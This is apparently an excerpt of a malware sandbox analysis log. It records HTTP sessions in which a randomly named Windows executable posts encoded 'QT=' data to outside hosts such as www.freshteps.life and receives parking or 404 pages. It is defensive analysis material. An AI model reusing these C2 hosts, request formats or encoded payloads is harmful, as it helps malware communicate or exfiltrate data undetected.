                                                        Cache-Control: no-cache
                                                        Host: www.deadshoy.tech
                                                        Origin: http://www.deadshoy.tech
                                                        Referer: http://www.deadshoy.tech/0sq9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 77 74 51 6b 51 69 76 43 53 39 68 39 42 33 63 64 72 44 46 75 55 59 2b 77 77 4d 57 6d 33 37 59 49 66 68 4b 66 64 75 34 72 75 53 76 33 6d 68 53 6f 4c 52 4c 76 69 45 6b 47 47 2b 4f 6e 31 4d 6a 76 47 6b 75 36 54 49 6b 71 53 37 4a 64 69 77 2b 65 57 74 6c 56 6c 54 58 62 69 30 2b 6c 77 49 64 49 50 31 67 4f 39 31 6e 50 45 4f 57 78 69 53 6c 79 4c 2f 42 4f 33 47 65 47 6e 59 55 73 52 79 53 68 2f 39 6a 58 6c 31 33 74 50 68 53 54 6e 52 2b 55 4a 4d 72 4f 52 62 62 34 68 69 30 59 50 6c 2b 56 6c 32 79 59 67 32 36 61 44 41 35 72 43 5a 37 79 67 6b 48 65 51 6a 66 57 61 43 4a 55 70 4d 6e 56 47 69 39 53 35 6c 4d 7a 34 37 4c 4d 4c 65 78 6b 74 32 5a 65 74 6d 4e 2f 63 51 4f 6d 30 50 58 54 6e 32 45 43 67 7a 7a 5a 6a 53 78 69 43 2b 6d 52 39 74 61 6f 70 45 32 39 64 6d 75 46 45 59 35 45 77 51 6a 73 36 6f 6c 31 33 71 4c 4f 68 62 2f 69 6e 4c 58 71 4d 41 68 43 6c 65 2b 6b 62 75 66 41 79 70 44 4f 76 [TRUNCATED]
                                                        Data Ascii: QT=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVwtQkQivCS9h9B3cdrDFuUY+wwMWm37YIfhKfdu4ruSv3mhSoLRLviEkGG+On1MjvGku6TIkqS7Jdiw+eWtlVlTXbi0+lwIdIP1gO91nPEOWxiSlyL/BO3GeGnYUsRySh/9jXl13tPhSTnR+UJMrORbb4hi0YPl+Vl2yYg26aDA5rCZ7ygkHeQjfWaCJUpMnVGi9S5lMz47LMLexkt2ZetmN/cQOm0PXTn2ECgzzZjSxiC+mR9taopE29dmuFEY5EwQjs6ol13qLOhb/inLXqMAhCle+kbufAypDOviJ2QgMQ6lYj2jnF/OdbO+s3WmtmryMqfJgUDCPZmTmicrCL+VR17XJSZxA9GcqU8+xrA7V+gQ6P9zYJOHQmX6ioaJmjX4jfe44NGv8iXS06QKgpBhuZ+n/0g3P64PdMF2djFnBDh7VAk/skHSYfl8HiO+iFM7+S3GTQk/Wag69YQLi//5BDCS7ChJHpiptAqgIzyCjrPY6MvfJD6fjIYbMBkbfoi7KlcVINoKj4wvZnuWuTeDFzwGtlftV4RBqfnqiKk/r5iuFzc+K57es6HGDfRQq7zvyED+VaSoFIYCk8lbPBg4bqZoM6XeWp+5gtKj+pIApDB7/08RICg064xN/O7jK4hA9TgsxeNAvIZsda6z2WeOiUheNbqubH1V0muGtl4CJAH8t6EiPOLoXyVvLiYQBsq14yF4BDE8GKGc7XIqUoBMssz+OXPA
                                                        Dec 10, 2024 18:49:30.429029942 CET3867OUTData Raw: 49 58 58 62 6e 5a 68 48 57 42 6c 69 6d 6b 56 42 6d 56 5a 4d 41 67 75 46 59 4e 76 49 6e 2b 4b 68 4d 42 58 35 74 55 65 51 72 76 6d 31 7a 77 6d 53 4f 71 47 6a 66 2b 73 79 56 6b 57 2b 34 56 76 76 61 73 4f 31 6f 37 55 6f 6d 37 44 6c 73 69 38 74 52 48
                                                        Data Ascii: IXXbnZhHWBlimkVBmVZMAguFYNvIn+KhMBX5tUeQrvm1zwmSOqGjf+syVkW+4VvvasO1o7Uom7Dlsi8tRHuEA7+O8QohpSd+tMJYVhNE3SgoX3ANZEB3PGwlfElUODhp4yYDUP91CEdz3hahsQgRNkYOIOdgzgN+5+KyWxtspCPVJPmQGES4FkfUeDGrUqLEiBnWUxJWQ+MSuECHotnlnEtCcAvV87hGicG5IQPxp97aknTtlIr
                                                        Dec 10, 2024 18:49:30.429053068 CET2721OUTData Raw: 76 78 53 55 78 41 64 66 73 76 64 59 61 58 75 71 37 77 63 6b 51 44 61 6c 48 47 50 68 75 65 51 4a 6c 30 47 4f 73 2f 74 49 35 49 2f 62 4c 72 5a 4a 56 4f 5a 61 48 36 53 47 4e 66 64 6f 6e 4a 68 64 37 67 49 6e 6a 7a 4b 50 59 78 62 47 77 33 54 58 4d 36
                                                        Data Ascii: vxSUxAdfsvdYaXuq7wckQDalHGPhueQJl0GOs/tI5I/bLrZJVOZaH6SGNfdonJhd7gInjzKPYxbGw3TXM6pdCT8fugK/WB5gmWhhZHdtHL6oNmjsk/s/xnX7UPjHKyGowzcueFJCN7CPfgNX+bupjj4KZ/J9EKA+HF/T7ye1XAGi2Ow9CKM7DzCJwobcI86zyrLLNl/go7M7yGNAvV7kljR+QM/rdELkn1cMf+gQj1YvkBSHKac
                                                        Dec 10, 2024 18:49:30.565650940 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:29 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1122
                                                        x-request-id: 7c4b7385-1fb3-42be-be61-89f8dfea47a1
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                        set-cookie: parking_session=7c4b7385-1fb3-42be-be61-89f8dfea47a1; expires=Tue, 10 Dec 2024 18:04:30 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:30.565660000 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2M0YjczODUtMWZiMy00MmJlLWJlNjEtODlmOGRmZWE0N2ExIiwicGFnZV90aW1lIjoxNzMzODUyOTcwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.11.2049771199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:33.085243940 CET443OUTGET /0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.deadshoy.tech
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:33.220235109 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:32 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1462
                                                        x-request-id: 8be0175d-6ab1-4c14-87ff-023e4edb07ba
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GxlRdSFQqcXELZHL5GFtQvyDcsNwpAytbwBdNTy7qtdpUXeYs0Fx/HHjF5dmkCw0HUyP1xz5shhRR4tdYpbK5A==
                                                        set-cookie: parking_session=8be0175d-6ab1-4c14-87ff-023e4edb07ba; expires=Tue, 10 Dec 2024 18:04:33 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 78 6c 52 64 53 46 51 71 63 58 45 4c 5a 48 4c 35 47 46 74 51 76 79 44 63 73 4e 77 70 41 79 74 62 77 42 64 4e 54 79 37 71 74 64 70 55 58 65 59 73 30 46 78 2f 48 48 6a 46 35 64 6d 6b 43 77 30 48 55 79 50 31 78 7a 35 73 68 68 52 52 34 74 64 59 70 62 4b 35 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GxlRdSFQqcXELZHL5GFtQvyDcsNwpAytbwBdNTy7qtdpUXeYs0Fx/HHjF5dmkCw0HUyP1xz5shhRR4tdYpbK5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:33.220467091 CET862INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGJlMDE3NWQtNmFiMS00YzE0LTg3ZmYtMDIzZTRlZGIwN2JhIiwicGFnZV90aW1lIjoxNzMzODUyOTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.11.2049772209.74.79.41807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:38.664721966 CET711OUTPOST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 35 34 55 58 78 48 6a 6b 47 51 46 42 4c 62 7a 52 76 6b 56 33 72 32 61 7a 66 45 78 50 6c 56 6d 4b 41 2b 75 58 2f 79 50 37 71 69 62 47 4b 39 64 73 75 4a 71 68 6b 65 38 79 35 34 4f 49 7a 51 50 2b 5a 76 32 42 6d 55 58 75 74 45 4a 43 32 50 69 54 79 70 50 69 59 52 66 59 54 43 6f 4f 56 7a 79 48 79 4e 6c 6a 50 6c 42 6f 32 4a 51 46 35 72 6a 2f 50 6b 75 57 4c 78 68 54 76 63 7a 73 2f 49 49 43 76 33 31 78 52 49 33 70 6b 65 2f 58 48 72 77 42 31 56 62 4c 41 4b 54 72 6c 79 59 65 4b 54 67 39 76 6e 47 69 72 62 4b 6f 69 6a 63 4a 61 42 45 39 6c 34 7a 6a 45 67 3d 3d
                                                        Data Ascii: QT=UNmj92+Wa4z554UXxHjkGQFBLbzRvkV3r2azfExPlVmKA+uX/yP7qibGK9dsuJqhke8y54OIzQP+Zv2BmUXutEJC2PiTypPiYRfYTCoOVzyHyNljPlBo2JQF5rj/PkuWLxhTvczs/IICv31xRI3pke/XHrwB1VbLAKTrlyYeKTg9vnGirbKoijcJaBE9l4zjEg==
                                                        Dec 10, 2024 18:49:38.852972984 CET533INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:38 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.11.2049773209.74.79.41807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:41.366607904 CET731OUTPOST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 37 5a 45 58 39 47 6a 6b 44 77 46 43 49 62 7a 52 6c 45 56 7a 72 32 57 7a 66 46 6b 43 6b 6d 43 4b 41 66 65 58 38 7a 50 37 76 69 62 47 53 4e 64 70 67 70 72 6a 6b 65 77 36 35 39 6d 49 7a 51 62 2b 5a 71 61 42 6c 69 66 74 76 55 4a 41 37 76 69 4e 74 35 50 69 59 52 66 59 54 47 42 72 56 7a 71 48 79 39 31 6a 4f 45 42 72 31 4a 51 43 75 62 6a 2f 65 55 75 53 4c 78 67 70 76 64 76 4b 2f 4c 67 43 76 79 78 78 53 5a 33 71 74 65 2f 4e 4b 4c 78 75 38 6c 79 43 49 36 32 58 6f 6c 70 4d 50 41 34 7a 75 78 4c 34 32 70 2b 4d 68 77 41 37 65 78 39 56 6e 36 79 34 5a 67 43 63 6f 39 5a 4d 34 34 4a 51 30 71 4c 79 43 72 58 45 6d 38 34 3d
                                                        Data Ascii: QT=UNmj92+Wa4z57ZEX9GjkDwFCIbzRlEVzr2WzfFkCkmCKAfeX8zP7vibGSNdpgprjkew659mIzQb+ZqaBliftvUJA7viNt5PiYRfYTGBrVzqHy91jOEBr1JQCubj/eUuSLxgpvdvK/LgCvyxxSZ3qte/NKLxu8lyCI62XolpMPA4zuxL42p+MhwA7ex9Vn6y4ZgCco9ZM44JQ0qLyCrXEm84=
                                                        Dec 10, 2024 18:49:41.539340019 CET533INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:41 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.11.2049774209.74.79.41807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:44.109718084 CET5156OUTPOST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 37 5a 45 58 39 47 6a 6b 44 77 46 43 49 62 7a 52 6c 45 56 7a 72 32 57 7a 66 46 6b 43 6b 6d 4b 4b 41 74 47 58 2b 51 6e 37 6f 69 62 47 66 74 64 6f 67 70 71 37 6b 65 34 2b 35 39 71 79 7a 53 6a 2b 59 49 53 42 74 77 33 74 6c 55 4a 41 6e 66 69 51 79 70 4f 71 59 53 6e 63 54 43 6c 72 56 7a 71 48 79 34 78 6a 65 6c 42 72 7a 4a 51 46 35 72 6a 61 50 6b 75 36 4c 78 35 4c 76 63 61 78 34 36 41 43 76 53 42 78 65 50 6a 71 76 2b 2f 54 50 4c 78 32 38 6c 75 42 49 36 37 73 6f 6c 30 58 50 47 63 7a 76 47 79 44 6d 72 4b 4e 77 32 41 67 57 79 74 33 6c 73 75 70 48 51 65 45 70 63 78 33 77 49 55 44 2b 34 48 69 53 61 4c 76 38 5a 69 41 63 54 59 63 52 56 50 53 45 66 7a 70 63 76 6e 67 48 33 45 52 58 71 43 72 61 52 49 72 6a 76 77 54 35 69 46 7a 35 79 6c 7a 6c 39 6a 45 34 38 74 4b 73 68 74 37 64 6f 30 59 38 54 65 65 76 59 77 46 5a 36 76 48 32 54 77 76 75 57 58 59 34 79 63 34 69 5a 50 52 37 4e 63 30 73 54 69 67 4c 68 79 73 38 48 2f 49 4f 74 38 4d 46 7a 71 6d 4a 6f 64 6d 57 63 68 57 36 76 61 [TRUNCATED]
                                                        Data Ascii: QT=UNmj92+Wa4z57ZEX9GjkDwFCIbzRlEVzr2WzfFkCkmKKAtGX+Qn7oibGftdogpq7ke4+59qyzSj+YISBtw3tlUJAnfiQypOqYSncTClrVzqHy4xjelBrzJQF5rjaPku6Lx5Lvcax46ACvSBxePjqv+/TPLx28luBI67sol0XPGczvGyDmrKNw2AgWyt3lsupHQeEpcx3wIUD+4HiSaLv8ZiAcTYcRVPSEfzpcvngH3ERXqCraRIrjvwT5iFz5ylzl9jE48tKsht7do0Y8TeevYwFZ6vH2TwvuWXY4yc4iZPR7Nc0sTigLhys8H/IOt8MFzqmJodmWchW6vaaV94lnhlkZtwFGoVKaKe+pnYOX0GU74uEAxLH8CSiVIXHRM4Jn+2adw5sK5cGEF1fKhMtPl1opzaWR8HgJ4uF3j6bPze8guhVx+m8/Wd/oh+Qi81/YsHxO22mFuz+sw7vPgj6eq8lr9UBiuUEFp6JSW7mdFRCdJCjEJ+0h0xl/dKyP6tYNBkgbG5XBdoNDOp2yMJUt/QkWFrp931pzLYzyTKO9xipYooNk8PTiknjOjIK96AG6tMGUS75WPJviDlfBjspcKNzdWRzGqobJMmS8J347v0sCmxehOxfd8GOLIZJqm0YCwWVJFomcbFadgh5S3H9mMPcGaox67QZ5+dcdzgMmRwZbTNYlUKXtdzXyU84FRdbV/9t/3bfhG2GIwBm6f9UfEgkATc6a7EhVfi8/4tATfk3tdtow6JuzmBhr1IvlPe3jRsMtLEsksNWDLHBv3AUnE/Ft9id7TUhPBBjlf+lKLRc6p77xIfHVzfCB6RfuGcNxzSoK6l8X3QTcg1nDaB/l+mjPkkAHLdDvy4a5XFPgyWByU/qW+CBspFGf1ugYtpdstOx4EpQz0avodiVlPxJwDu0rHnxze7PpPtrITc2+S1rzuAD9Zeusa92y6MOe0edJWROuL3u62eLAB/AvELx7YERwr18SJ7cjqq3VhqESen9ieUAN [TRUNCATED]
                                                        Dec 10, 2024 18:49:44.109740019 CET2724OUTData Raw: 67 70 30 70 48 55 46 4c 69 2f 50 6b 5a 4d 63 71 70 57 78 7a 65 39 49 52 71 34 6d 38 6f 46 68 55 48 65 59 33 35 35 69 66 69 5a 30 57 69 46 50 77 4f 66 2f 4a 35 47 50 76 45 41 33 51 66 6a 30 6b 6b 6e 6a 34 5a 52 39 4a 52 35 67 38 2f 57 31 42 4d 50
                                                        Data Ascii: gp0pHUFLi/PkZMcqpWxze9IRq4m8oFhUHeY355ifiZ0WiFPwOf/J5GPvEA3Qfj0kknj4ZR9JR5g8/W1BMPZ7eqDG5F+K/sW1STNjqZ308T6N4mO4/AziHLHx6HynGqB54ZPQkv6dlwbTVSQ+VvqKV5j3kL8veI4sqZOZk2FzOY8D5A3HwqIaOLLkqwIgAcCDRStWroqJ17VkNjlv/b2hpbaEz7epWuONXh8R53rMnWqFyrCQT0E
                                                        Dec 10, 2024 18:49:44.288527966 CET533INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:44 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
